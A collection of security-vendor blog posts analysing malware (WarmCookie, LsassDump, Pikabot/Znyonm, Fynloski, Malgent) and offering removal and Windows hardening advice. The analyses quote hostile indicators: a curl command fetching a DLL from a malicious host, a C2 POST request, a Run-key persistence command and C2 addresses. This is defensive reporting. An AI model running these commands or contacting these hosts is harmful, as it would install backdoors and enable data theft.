FakeUpdate Spreads WarmCookie as Chrome, Edge Updates

Researchers at Gen Threat Labs have uncovered a campaign spreading the WarmCookie backdoor. The core of the is a previously known FakeUpdate, that involves tricking victims into downloading and running a fake web browser update. As I’ve mentioned in the introduction, these attacks are currently targeting users in France. Besides popular browsers like Google Chrome, Mozilla Firefox, and Microsoft Edge, the campaign also offers “updates” for apps like Java, VMware Workstation, Proton VPN, and WebEx. To do this, attackers hack or create websites that display fake web browser update requests. And, sure enough, as one follows the demand, they receive a malicious program under the guise of browser update.

In fact, FakeUpdate campaign is not entirely new, as previous similar campaigns have circulated online. It is also not new for WarmCookie to use tricky and unusual spreading schemes. Researchers previously encountered this backdoor being distributed under the guise of job offers. This time, however, aside from the new distribution method, there is an updated version of WarmCookie. It can now enable data and file theft, device profiling, program enumeration (through the Windows Registry), arbitrary command execution via CMD, screenshot capture, and additional malware installation capabilities.

FakeUpdate France Campaign Details

In brief, the FakeUpdate site is designed to mimic the real one, featuring a pretty convincing URL. As of the time of writing, the site edgeupgrade[.]com was still operational. Clicking the Update button downloads an installation file “Install_x64.exe”, which is the WarmCookie backdoor. According to the researchers’ report, once launched, the malware performs standard checks for a virtual environment. If no virtual environment is detected, it gathers the system fingerprint and sends it to the attackers’ C2 server.

As previously mentioned, this backdoor provides attackers with unrestricted access to the compromised system. The latest campaign observed by Gen Threat Labs shows WarmCookie has been upgraded with new capabilities. Among others, running DLLs from the temp folder and transmitting the output, alongside the ability to transfer and execute EXE and PowerShell files. Beyond basic data theft, attackers can also deliver payloads like ransomware.

Regarding legitimate web browser updates, all modern browsers on Windows are now automatically updated. This eliminates the need to download any installation files manually – the user may only need to restart the browser.

How to Stay Protected?

As this campaign has several distinct milestones in user interaction, the key to avoiding this threat will be in proactive counteraction. First and most effective solution is to remain vigilant while browsing the web. Even with highly convincing phishing campaigns, exercise caution when prompted to download or update software. Instead, always visit the official website of the application you intend to update.

Another proactive option is to use advanced anti-malware software with built-in Internet security. If the first precaution is overlooked, anti-malware software will block access to phishing pages. GridinSoft Anti-Malware offers advanced protection, including an Internet Security feature, making it a strong option to consider.

The post FakeUpdate Campaign Spreads WarmCookie Virus in France appeared first on Gridinsoft Blog.

Trojan:Win32/LsassDump.A Overview

Trojan:Win32/LsassDump.A is a heuristic detection by Microsoft Defender, triggered by unauthorized access to the Windows LSASS process. As a heuristic detection, it flags attempts to access the process, particularly its memory dump, regardless of whether it’s initiated by malware or a user. In both scenarios, the Defender will deem this behavior suspicious and respond accordingly.

LSASS (Local Security Authority Subsystem Service) is a legitimate Windows process that manages security policies, and user authentication and handles security tokens and credentials. In essence, the memory dump of this process stores user credentials, including passwords, in both encrypted and sometimes unencrypted forms. Unsurprisingly, attackers are keen on compromising this process.

This gives us a clue on what malware can cause the Trojan:Win32/LsassDump.A detection. Backdoors often use information like one stored in the LSASS memory to gain persistence, particularly for creating a so-called shadow user. Though, there are spyware samples that do the same trick, most often ones that aim at long-term presence in the infected system.

Technical Analysis

Now let’s take a practical look at how malware behaves on a system. Being a heuristic detection, it’s based on observed behavior rather than a specific threat. Thus, we’ll focus on the malware’s impact on the system rather than discussing a specific threat. Memory dumps can be obtained through various methods, including Task Manager, DLL Host, or DbgHelp.dll. Yet LSASS is more attractive, as its memory contains the most actual information.

In this case, upon execution, the malware immediately performs checks to detect virtualized environments, sandboxes, or debuggers. The malware leverages the Windows Error Reporting component along with other legitimate processes, such as:

%windir%\System32\svchost.exe -k WerSvcGroup
%windir%\system32\WerFault.exe
wmiadap.exe /F /T /R

Further, it reviews a selection of registry values that can contain traces of virtualization or, at the very least, enabled logging. These checks point at this malware aiming at long-term persistence once again, hinting that we’re likely dealing with a backdoor.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\EnableModuleLogging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\Diagnosis
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Diagnostics.AsyncCausalityTracer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Policies\Microsoft\Cryptography\Configuration

Once the malware verifies that the system isn’t virtualized or under debugging, it advances to the next phase – neutralizing security software. The resulting process tree is below, and it

C:\Windows\system32\services.exe
C:\Windows\system32\SecurityHealthService.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p

The malware then queries the following system values, in order to collect information about the client. Together with data it has got in previous steps

C:\Program Files\Windows Defender\MpClient.dll
C:\Program Files\Windows Defender\MpOAV.dll
C:\Program Files\Windows Defender\MsMpLics.dll
C:\Program Files\WindowsProtection\Updater.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer

Payload

During execution, the malware downloads certain files from https://developerr-bots[.]xyz. Those are likely configuration files, needed for this backdoor to get further instructions. Still, these can be malware payload files, too – it is entirely case-dependent.

https://developerr-bots.xyz/125688/Updater.exe?hash=AgADZw
https://developerr-bots.xyz/125688/Updater.exe?hash=AgADZwLQ

These “Updater.exe” files are further placed in several different directories across the system volume. Such a tactic makes it much harder for users to perform manual removal, and also decreases potential damage when a certain antivirus program finds only one malicious file.

C:\Users\user\AppData\Local\Temp\DownloadScript\updater.exe
%SAMPLEPATH%\7e7e69685128bee624a05f06de2bbe0849cf7ca8629103136872a1b0ada46236.exe
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\999d72a4e033bba86d05407570c67cba\System.Management.Automation.ni.dll

The malware once again leverages WerFault.exe to silently terminate the lsass.exe process and generate a memory dump. That is exactly the action that causes the LsassDump.A detection.

After completing its operations, the malware reconnects to the C2 server and exfiltrated the collected data. As a backdoor, it transmits only basic system information and awaits further commands from the attacker. It is likely that the malware uses the same https://developerr-bots.xyz as the C2 server.

How To Remove Trojan:Win32/LsassDump.A?

Removing Trojan:Win32/LsassDump.A, can typically be handled by the built-in Windows security tools. However, to avoid such incidents, I recommend using an advanced anti-malware solution like GridinSoft Anti-Malware. Just follow this guide to eliminate malware from your system and ensure robust, proactive protection going forward.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Win32/LsassDump.A appeared first on Gridinsoft Blog.

This guide will help you remove this threat completely. Follow these step-by-step instructions to eliminate the threat. We’ll start with methods you can try right now, then move to more advanced techniques if needed.

What is Trojan:Win32/Malgent!MSR?

Trojan:Win32/Malgent!MSR is a backdoor that gives criminals remote access to your computer. The name “Malgent” stands for “Malicious Agent” because it works with other malicious programs. This threat usually comes bundled with fake software activators or cracked programs.

Once installed, this malware connects to remote servers controlled by criminals. It can download more malware to your system. It can also steal your personal information, similar to other information stealing malware we’ve analyzed.

How to Tell if You’re Infected

Look for these warning signs on your computer:

• Slow computer performance – Your system takes longer to start and respond
• High CPU usage – Task Manager shows processes using lots of resources
• Unknown processes running – Strange programs appear in Task Manager
• Antivirus alerts – Repeated detections of Trojan:Win32/Malgent!MSR or heuristic virus warnings
• Network activity – Your internet connection seems busy even when you’re not using it
• New files appearing – Files you didn’t create show up in system folders

Manual Removal Steps

You can remove Trojan:Win32/Malgent!MSR manually by following these steps carefully. Take your time with each step. Make sure you complete each one before moving to the next.

Step 1: Restart in Safe Mode

Safe Mode prevents the malware from running while you clean your system. Here’s how to start in Safe Mode:

1. Press Windows + R keys together
2. Type msconfig and press Enter
3. Click the Boot tab
4. Check the Safe boot option
5. Select Minimal and click OK
6. Restart your computer

Step 2: Check Running Processes

Look for suspicious processes that might be related to the malware:

1. Press Ctrl + Shift + Esc to open Task Manager
2. Click the Processes tab
3. Look for these suspicious processes:
   • Random named .exe files with high CPU usage
   • Processes running from temp folders
   • Unknown processes with network activity
4. Right-click suspicious processes and select End Task
5. Note the file location before ending the process

Step 3: Delete Malicious Files

Remove files that the malware might have created. Check these common locations:

1. Open File Explorer and navigate to these folders:

      C:\Users\[YourUsername]\AppData\Local\Temp\
      C:\Users\[YourUsername]\AppData\Roaming\
      C:\ProgramData\Microsoft\Windows\WER\Temp\
      C:\Windows\Temp\
      

2. Look for recently created files with random names
3. Delete any suspicious .exe files you don’t recognize
4. Pay attention to files created around the time you noticed the infection

Step 4: Clean Startup Programs

Remove the malware from your startup programs so it doesn’t run when Windows starts:

1. Press Windows + R and type msconfig
2. Click the Startup tab
3. Look for unknown programs or programs with suspicious names
4. Uncheck any suspicious entries
5. Click Apply and OK

Also check the startup folder:

1. Press Windows + R and type shell:startup
2. Delete any suspicious files in this folder

Step 5: Clean Registry Entries

Remove malicious registry entries. Be careful with this step:

1. Press Windows + R and type regedit
2. Navigate to these registry keys:

      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      HKEY_CURRENT_USER\Software\Classes\Local Settings
      

3. Look for entries with suspicious names or paths to temp folders
4. Right-click suspicious entries and select Delete
5. Be careful not to delete legitimate Windows entries

Step 6: Check Scheduled Tasks

Malware often creates scheduled tasks to restart itself:

1. Press Windows + R and type taskschd.msc
2. Click Task Scheduler Library
3. Look for tasks with random names or suspicious triggers
4. Right-click suspicious tasks and select Delete
5. Check if any tasks point to files in temp folders

Step 7: Clear Temporary Files

Clean up temporary files where malware might hide:

1. Press Windows + R and type %temp%
2. Select all files (Ctrl + A) and delete them
3. Empty your Recycle Bin
4. Run Disk Cleanup to remove additional temporary files

Step 8: Restart Normally

After completing all steps, restart your computer normally:

1. Press Windows + R and type msconfig
2. Click the Boot tab
3. Uncheck Safe boot
4. Click OK and restart

Automatic Removal with GridinSoft Anti-Malware

Manual removal can be complex and time-consuming. For a faster, more reliable solution, GridinSoft Anti-Malware offers automatic detection and removal of backdoor trojans like Malgent. Professional anti-malware software can find hidden components and registry changes that you might miss.

The automatic approach is especially useful if you’re not comfortable editing the registry or if the manual steps didn’t completely remove the threat.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Browser Cleanup

If you suspect the malware affected your browser, clean it thoroughly:

Remove Malicious Browser Extensions

Check all your browsers for suspicious extensions:

Reset Your Browser

If you suspect browser-based components of the malware, reset your browser completely:

How to Prevent Future Infections

Trojan:Win32/Malgent!MSR typically spreads through these methods. Avoid them to stay safe:

Avoid Suspicious Software

• Don’t download cracked software – This is the most common source of Malgent infections. Learn about the dangers of cracked games and software
• Avoid fake system tools – Programs claiming to “speed up” or “clean” your computer often contain malware
• Don’t use unauthorized activators – Windows and Office activators frequently contain backdoors
• Be careful with “free” versions – Legitimate paid software offered for free is usually infected

Practice Safe Computing

• Keep Windows updated – Install security updates promptly
• Use reputable antivirus software – Keep it updated and running. Be careful not to disable Windows Defender unless necessary
• Download from official sources – Use official websites and app stores
• Scan downloads – Check files before running them
• Create regular backups – Keep important files backed up safely

Monitor Your System

Watch for signs of infection:

• Check Task Manager regularly for unknown processes
• Monitor your network usage for unusual activity
• Pay attention to system performance changes
• Keep an eye on your startup programs

Frequently Asked Questions

What is Trojan:Win32/Malgent!MSR and why is it dangerous?

Trojan:Win32/Malgent!MSR is a backdoor trojan that gives criminals remote access to your computer. It’s dangerous because it can steal your personal information, install more malware, and use your computer for criminal activities without your knowledge. Understanding trojan malware facts can help you recognize these threats better.

How did Trojan:Win32/Malgent!MSR get on my computer?

This malware usually comes bundled with cracked software, fake system tools, or pirated programs. It can also spread through infected email attachments or malicious websites. The most common source is downloading “free” versions of paid software.

Can I remove Trojan:Win32/Malgent!MSR manually?

Yes, you can remove it manually by following the steps in this guide. However, manual removal requires careful attention to detail and can be time-consuming. If you’re not comfortable with technical procedures, automatic removal tools are safer and more reliable.

Is it safe to delete processes related to Malgent?

Yes, it’s safe to delete malicious processes related to Malgent. The trojan creates these processes to maintain its presence on your system. However, be careful not to delete legitimate Windows processes. When in doubt, research the process name before deleting it.

What if my antivirus shows false positive detections?

Sometimes legitimate programs like Tor Browser are incorrectly flagged as Trojan:Win32/Malgent!MSR. If you downloaded software from official sources and you’re sure it’s legitimate, you can add it to your antivirus exclusions. However, if you downloaded from suspicious sources, treat the detection as real.

How can I prevent Trojan:Win32/Malgent!MSR infections?

Avoid downloading cracked software, fake system tools, and unauthorized program activators. Download software only from official sources. Keep your operating system and antivirus updated. Be cautious with email attachments and suspicious websites.

What if manual removal doesn’t work?

If manual removal doesn’t completely eliminate the threat, use professional anti-malware software like GridinSoft Anti-Malware. Some variants of this trojan can be particularly persistent and may require specialized removal tools to completely clean your system. You might also encounter similar issues with other persistent trojans that need automatic removal.

Can Trojan:Win32/Malgent!MSR steal my passwords?

Yes, this backdoor trojan can steal passwords and other sensitive information. It can capture keystrokes, take screenshots, and access stored credentials in your browsers. If you suspect you’re infected, change your important passwords after cleaning your system.

Does Trojan:Win32/Malgent!MSR affect all versions of Windows?

This malware can affect various Windows versions, including Windows 10 and Windows 11. The removal steps in this guide work for most Windows versions, though some interface details might vary slightly between versions.

How do I know if the removal was successful?

After removal, monitor your system for a few days. Check if your computer performance improves, if unknown processes disappear from Task Manager, and if your antivirus stops showing detections. Run a full system scan to confirm the threat is gone.

Conclusion

Removing Trojan:Win32/Malgent!MSR from your computer is possible with the right approach. The manual method works well if you follow each step carefully. However, automatic removal tools provide better protection against hidden components and future threats.

Remember that prevention is always better than removal. Avoid downloading software from untrusted sources. Keep your system updated and use reliable antivirus protection. These simple steps will help you avoid most malware infections.

If you found this guide helpful, you might also want to read about similar trojan variants, PUA detections, and connection security issues.

The post How to Remove Trojan:Win32/Malgent!MSR from Windows 11 appeared first on Gridinsoft Blog.

Secure Windows 10: Useful Tips

1. Update Your Software Regularly

Regular updates are essential to secure Windows 10 from hackers. By updating Windows and all your software, you prevent hackers from accessing your computer. Developers create updates to shield private information by fixing code bugs and eliminating incompatibilities. As a result, larger software packages often contain vulnerabilities that hackers are more likely to discover and exploit.

Each time attackers discover new loopholes or methods to hack into systems, developers release new versions of these crucial updates. Unfortunately, many users neglect these updates, sticking with outdated software versions, which hackers exploit to breach security.

2. Turn on Your Firewall

The Windows Firewall is a robust network security system integrated into recent Windows operating systems, including Windows 10, designed to protect internal networks from external threats like intruders or malware. It scrutinizes both hardware and software, tracking incoming and outgoing traffic. The firewall allows or blocks data packets based on established security rules, acting as a crucial barrier to secure Windows 10 from any incoming threats.

Follow these steps to enable the Windows 10 Firewall and protect your computer:

1. Open Control Panel:

• Click the Start menu.
• Type Control Panel in the search bar and select it from the list of results.

2. Navigate to Windows Firewall:

• In the Control Panel, click on System and Security.
• Then click on Windows Defender Firewall.

3. Turn on Windows Firewall:

• On the left side of the screen, click on Turn Windows Defender Firewall on or off.
• Under both the Private network settings and Public network settings, select the option to Turn on Windows Defender Firewall.
• Click OK to save your settings and activate the firewall.

3. Use Device Encryption or Bitlocker to Protect Your Hard Drive

Encryption works by scrambling data with a complex cipher that makes the information unreadable without the correct password. Many versions of Windows 10 Home include Windows Device Encryption. This feature allows you to encrypt files and folders on demand and create disk partitions to store encrypted bulk data, greatly enhancing your chances to secure Windows 10 and maintain the integrity of your files. However, be aware that using disk encryption utilities might slow down weaker systems or those equipped with HDDs, as these tools can impact performance.

Here are the steps to set up BitLocker on your Windows 10 device:

1. Check if BitLocker is Available:

• Open the Control Panel.
• Navigate to System and Security > BitLocker Drive Encryption.
• If BitLocker is not available, your version of Windows may not support it, or your hardware may lack a Trusted Platform Module (TPM) chip.

2. Turn On BitLocker:

• Choose the drive you want to encrypt from the list.
• Click Turn on BitLocker.
• BitLocker will check if your system meets the requirements for encryption.

3. Choose How to Unlock at Startup:

• You will be asked how you want to unlock the drive at startup. Options typically include using a password or a smart card.
• Choose Use a password to unlock the drive and enter a strong password.

4. Save Your Recovery Key:

• BitLocker will prompt you to save a recovery key, which can be used to access your encrypted drive if you forget your password.
• You can save it to your Microsoft account, a file, a USB drive, or print it.
• It’s crucial to save the recovery key in a secure location separate from your computer.

5. Choose Encryption Options:

• Select whether to encrypt the used disk space only (faster and best for new PCs and drives) or the entire drive (best for PCs and drives already in use).
• Click Next to continue.

6. Start the Encryption Process:

• Review your choices and click Start encrypting.
• The encryption process can take several hours, depending on the size of the drive and the data stored on it.

Once BitLocker is enabled, your drive is protected. Every time you start your device, you will need to enter the password or have the smart card to access the encrypted drive. This ensures that your data is secure even if your device is lost or stolen.

4. Use a Secure Password Manager with Two-Factor Authentication (2FA)

Simple passwords make user accounts vulnerable to hacks, making it crucial to use passwords that combine a complex array of letters and characters for enhanced protection. Remembering all these complex passwords can be challenging, which is why it’s wise to use a password manager. These tools store, auto-fill, and generate passwords for you. Most password managers also support two-factor authentication (2FA), adding an extra layer of security. This additional step might involve something like a fingerprint, a confirmation code sent to your phone, or a facial scan—essential measures to secure Windows 10 against unauthorized access.

5. Enable Controlled Folder Access to Prevent Ransomware Attacks

Ransomware attacks are a significant threat to personal and organizational data security. Windows 10 offers a robust feature called Controlled Folder Access within Windows Defender Security Center. This feature helps protect valuable data from malicious apps and threats, such as ransomware. By default, it protects common folders where documents, pictures, videos, and files are stored, and you can also add additional folders to be monitored to enhance protection.

To enable Controlled Folder Access, simply go to the Windows Defender Security Center, click on ‘Virus & threat protection,’ and navigate to the ‘Ransomware protection’ section. From there, you can switch on Controlled Folder Access. This simple step can significantly secure Windows 10 by blocking unauthorized applications from making changes to your protected folders.

How to protect your files from ransomware attacks by enabling Controlled Folder Access:

1. Open Windows Security Settings:

• Click on the Start menu.
• Type Windows Security in the search bar and open the app.

2. Navigate to Virus & Threat Protection:

• In the Windows Security window, click on Virus & threat protection.

3. Access Ransomware Protection:

• Scroll down and find the Ransomware protection section.
• Click on Manage ransomware protection.

4. Enable Controlled Folder Access:

• In the Ransomware protection settings, find the Controlled folder access section.
• Switch the toggle to On to enable Controlled Folder Access.

5. Manage Protected Folders:

• After enabling Controlled Folder Access, you can add or remove folders that you want to protect.
• Click on Protected folders and then use the Add a protected folder button to select folders on your computer that you wish to protect.

6. Allow Apps Through Controlled Folder Access:

• If you have legitimate apps that need to make changes to protected folders, you can allow them through this feature.
• Under Allow an app through Controlled folder access, click on Add an allowed app and select the app you trust to make changes to protected folders.

7. Review and Test:

• Once you’ve configured your settings, review everything to ensure it’s set up correctly.
• Test the feature by attempting to modify files in the protected folders with a non-allowed application to check if the access is correctly blocked.

6. Keep Your Browsing Private with a VPN, Especially on Public Wi-Fi

Using a VPN can significantly enhance your privacy and anonymity online by creating a private network from a public Internet connection. This security method not only masks your IP address but also makes your online activities nearly impossible to track. Moreover, a VPN provides a more encrypted and secure connection than a typical Wi-Fi hotspot. By creating a secure tunnel, a VPN helps conceal your browsing activities, allowing you to access region-blocked websites without exposure. This is an essential step to secure Windows 10 when using public WiFi.

7. Avoid Dangerous Pop-Ups

Although pop-up windows may seem merely annoying—wasting your time and slowing down your PC—they can also pose serious risks by infecting your device with malware. These pop-up banners are harmless until you click on them, which activates their damaging effects. Therefore, it’s crucial to be discerning about what you click on. To protect yourself, consider using an ad blocker or avoid visiting sites known for dubious pop-ups. If ad blockers don’t cut it, your device might already be compromised by malware. Scan your device with anti-malware software to eliminate any such threats and further secure Windows 10.

8. Install Anti-malware

Antivirus software will be your next level of protection against malware. For example, GridinSoft Anti-Malware can remove all malware from your computer. In addition, it scans the system for viruses, spyware, and adware and prevents rootkits or backdoors from invading your PC.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Our tool can work without conflict with other antivirus programs as additional protection. GridinSoft Anti-Malware can free the user’s browser from third-party control and return it to its working state.

The post How to Secure Windows 10 from Hackers appeared first on Gridinsoft Blog.

What is Trojan:Win32/Znyonm?

Trojan:Win32/Znyonm is a detection associated with backdoor malware, usually the one that uses deep obfuscation and anti-analysis techniques. In particular, this detection name appears with malware like GuLoader, Remcos RAT, and Pikabot. Others can also be seen though, as Microsoft does not attach this detection name to specific malware families, but rather to its properties.

The primary objectives of Znyonm include facilitating remote access or deploying additional payloads. As a preliminary stage, it establishes persistence within systems, escalates privileges, and communicates with command-and-control (C2) servers. Among the samples found on VirusTotal, I’ve seen the usage of multi-stage loading of code fragments from remote servers via .LNK, VBS, and PowerShell scripts. This allows it to bypass antivirus detection and deliver any malicious payload to the victim’s computer.

Znyonm Trojan Analysis

For the sample of Znyonm to analyze, I’ve picked one of fresh samples of Pikabot. This is a modular backdoor malware that emerged in early 2023. The malware gained prominence as a substitute for the infamous QakBot. The malware serves as an initial access point in high-profile cyberattacks. Its primary tactic for initial access is spear phishing and thread-hijacking techniques. Pikabot deploys exploit kits, ransomware, or other malware tools.

Spreading ways

Znyonm/Pikabot gains initial access through spear phishing. It targets users with convincing emails that look like routine workflow messages; frauds particularly employ thread hijacking to make it look genuine. The format of the attachment may vary – from a PDF document to a ZIP archive that contains the payload. In either case, email text will try to convince the user to launch the attachment and follow its instructions.

Another method is malvertising via major ad engines like Google or Facebook. Hackers trick users into downloading and installing malware by using the names of popular free software, drivers, and tools. The sites used in these campaigns live for an extremely short time but can infect hundreds of users.

Unpacking, Launch & Persistence

Upon execution, Znyonm runs a set of checks to avoid analysis, by calling NtQueryInformationProcess. Then, it decrypts the DLL file and performs another round of anti-analysis and anti-debug tricks. After passing them, the malware assembles its core from encrypted parts of the DLL it arrives in. To gain persistence and privileges, Pikabot/Znyonm performs process hollowing.

C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll

Pikabot malware avoids detection by directly calling the required APIs using their hash for the first 3 APIs. Next, it switches to dynamic API resolution to evade EDR/XDR detection. The malware checks the system language before gathering system information, ceasing execution if one from the ban list is found. After passing the check, it collects system properties to fingerprint the system.

The fingerprint includes user name, computer name, display information, CPU information, physical and virtual memory, domain controller name, operating system version, and a snapshot of its process. This is a typical set of data for backdoor malware, called to distinguish one system from another. Some backdoors though were gaining the ability to collect more data with time, getting closer in functionality to spyware.

C2 Communication

The malware sends collected data to the command server using an HTTP POST request over HTTPS protocol. Upon the first contact, the command server sends the response with the command and configuration info. The latter consists of a command-specific code, URL, file address, and the action malware should execute. Some of the commands also require Pikabot to send the results to the C2.

POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2

How to Remove Trojan:Win32/Znyonm?

If you receive a notification about Trojan:Win32/Znyonm detection, an anti-malware scanning is needed. As you can see from the analysis above, Znyonm is nothing to mess around with, and can lead to more serious and diverse malware infections. Gridinsoft Anti-Malware will fit perfectly for malware removal.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Win32/Znyonm appeared first on Gridinsoft Blog.

Behavior:Win32/Fynloski.gen!A Overview

Behavior:Win32/Fynloski.gen!A is a detection name used by Microsoft Defender to identify a specific type of malicious behavior associated with the Fynloski malware family. This malware group is not a stand-alone family, but rather a group of malicious programs that share code similarities. It’s a heuristic detection, meaning it detects Fynloski-like malware based on its actions rather than a specific signature.

Fynloski malware typically allows attackers to control the infected system remotely, a normal function for a backdoor. It can steal sensitive information such as passwords, personal data, and banking details, capture screenshots, record keystrokes, monitor user activities – overall, act as spyware. It can also download and install other malicious software onto the infected system. Win32/Fynloski spreads through email attachments, downloads from compromised websites, and software from untrusted sources.

Technical Analysis

Let’s look at how this works using a specific example. After infiltrating the system, it performs checks typical of most malware to detect the presence of a virtual environment or debugger. The malware checks the following locations:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\System\ConfigureTelemetryOptInSettingsUx

These files and keys can contain information about configurations used for security and telemetry collection in virtual environments. The malware quits further execution shall it find any traces of the virtualization here.

After finishing the initial checks, Fynloski collects system information. This information does not include confidential data; its purpose is to create a digital fingerprint of the system for future identification. The malware collects information from the following locations:

C:\Windows\AppCompat\Programs\Amcache.hve
C:\Windows\System32\drivers
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy

The first file contains information about recently launched programs and installed software, which can provide insight into the system configuration and installed applications. The subsequent registry keys contain information about the user and OS settings.

To avoid detection, the reviewed sample uses standard encoding algorithms. This, however, differs from one sample to another: some of the more sophisticated samples may use deep sample encryption that is lifted only in the runtime. Also, considering that the original detection comes from the heuristic engine, there are high chances that the samples use unique packing or rebuilding, which additionally enhances detection evasion.

Execution

After performing all checks and gathering the necessary information, the malware establishes persistence in the system. It executes the following shell command:

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support GFX" /t REG_SZ /d "%APPDATA%\Xpers\Gpers.exe" /f

This command adds an entry into the current user’s autoloader section to run a specific program when the user logs in.

Next, Fynloski connects to its Command and Control (C2) server to transmit information to the attackers and receive further commands. The following addresses are used for this purpose:

tcp://betclock.zapto.org:35000
UDP a83f:8110:0:0:4b8e:21:0:0:53
TCP 23.216.147.64:443
TCP 192.229.211.108:80
TCP 20.99.185.48:443

How To Remove Behavior:Win32/Fynloski.gen!A

To remove Behavior:Win32/Fynloski.gen!A, I recommend using advanced anti-malware software. GridinSoft Anti-Malware is an excellent option as it can neutralize the threat even during the early attack stages. Download it, run a Full scan and remove all the threats that it has detected.

The post Behavior:Win32/Fynloski.gen!A appeared first on Gridinsoft Blog.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim’s device completely. Users often download RATs with a legitimate program, i.e., inside of hacked games from torrents or within an email attachment. Once an attacker compromises the host system, it can use it to spread RATs to additional vulnerable computers, thus creating a botnet. In addition, RAT can be deployed as a payload using exploit kits. Once successfully deployed, RAT directly connects to the command-and-control (C&C) server the attackers control. They achieve this by using a predefined open TCP port on the compromised device. Because the RAT provides administrator-level access, an attacker can do almost anything on a victim’s computer, such as:

• Use spyware and keyloggers to track the victim’s behavior
• Gain access to sensitive data, including social security numbers and credit card information
• View and record video from a webcam and microphone
• Take screenshots
• Format disks
• Download, change or delete files
• Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program. RAT is similar to Remote Desktop Protocol (RDP) or Anydesk but differs in its stealth. RAT establishes a command and control (C2) channel with the attacker’s server. This way, attackers can send commands to RAT, and it can return the data. RATs also have a set of built-in controls and methods for hiding their C2 traffic from detection.

RATs can be combined with additional modules, providing other capabilities. For example, suppose an attacker may gain a foothold using a RAT. Then, after examining the infected system with the RAT, he decides he needs to install a keylogger. Depending on his needs, RAT may have a built-in keylogging feature or the ability to download and add a keylogger module. It can also load and run an independent keylogger.

Why Remote Access Trojan is Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people. As a result, they gained remote access to a computer authenticated in the SCADA (supervisory control and data collection) machines that controlled the country’s utility infrastructure. In addition, Remote Access Trojan allowed attackers to access sensitive resources by bypassing the elevated privileges of the authenticated user on the network. Thus, an attack using RATs can take on a threatening scale, up to the threat to national security.

